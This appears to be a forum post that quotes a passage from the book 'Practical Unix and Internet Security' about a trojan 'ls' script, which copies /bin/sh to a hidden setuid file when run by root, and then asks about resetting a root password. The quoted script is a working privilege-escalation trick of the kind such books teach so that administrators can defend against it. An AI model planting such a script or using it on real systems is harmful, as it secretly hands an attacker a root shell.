practicle unix and internet security page number 88 discusses a scenario where author needed to get someones root password who allowed him to get root access on that PC but denied to give root password for some reasons

he writes:
"first we create an executable shell file ls in current directory:
#!bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}

"

......superdude is suposed to be root
then he tricks administrator to SU to root and get into current directory and execute ls command the fake ls file in current directory is executed as it is in the current directory.
anyways i was just wondering if he had a root access to that PC did he really needed to do that after all it is just a trick i have heard that there is some way(not the password cracker) to get(or change unix password) provided that u have access to the system as root but don't know root password